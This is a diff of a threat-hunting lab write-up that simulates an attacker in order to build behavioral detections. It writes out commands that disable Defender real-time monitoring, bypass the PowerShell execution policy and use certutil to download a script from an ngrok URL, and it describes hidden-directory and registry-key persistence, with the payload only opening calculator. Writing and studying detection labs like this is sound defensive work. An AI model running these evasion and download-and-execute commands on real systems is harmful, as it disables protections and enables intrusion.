LukaGroff/Threat-Hunt-Development/behavioral-detection-analysis.md

 ## ⚠️ Adversary Simulation Steps

-1. On Attacker machine I created a file with a script that creates a hidden directory with a "reverse shell" script (just opens calculator app).
+1. On Attacker machine I created a file (maint.ps1) with a script that creates a hidden directory with a "reverse shell" script (just opens the calculator app).
 It also creates persistence with registry keys that runs on logon.

 <img width="750" height="438" alt="image" src="https://github.com/user-attachments/assets/1971e217-14ac-4715-a092-b21b70c70093" />

 2. I created a python http server and proxied the connection through ngrok, to create a temporary URL from which I can pull the created file onto the victim machine.
+**Commands used on Kali Linux**: `python3 -m http.server 8888` & `ngrok http 8888`

 3. On the victim machine I disabled real time monitoring and bypassed execution policy with: `Set-MpPreference -DisableRealtimeMonitoring $true` and `Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass`

 4. The previous command allowed certutil to download files from the attacker machine and run the downloaded file.
-Command used: `certutil -urlcache -split -f https://fisher-promarriage-untremendously.ngrok-free.dev/maint.ps1 maint.ps1`
+**Command used:** `certutil -urlcache -split -f https://fisher-promarriage-untremendously.ngrok-free.dev/maint.ps1 maint.ps1`

 <img width="650" height="186" alt="image" src="https://github.com/user-attachments/assets/3256cdf0-ce4c-4ad2-af2a-8ca2910c91ea" />

-5. After executing the downloaded file, a new file was ready to be executed which could lead to a reverse shell, but I decided to let it just execute calculator.exe
+6. After executing the downloaded file, a new file was ready to be executed which could lead to a reverse shell, but I decided to let it just execute calculator.exe

 <img width="450" height="918" alt="image" src="https://github.com/user-attachments/assets/d0ca2bac-2888-4499-88fb-ada1aa6f0c84" />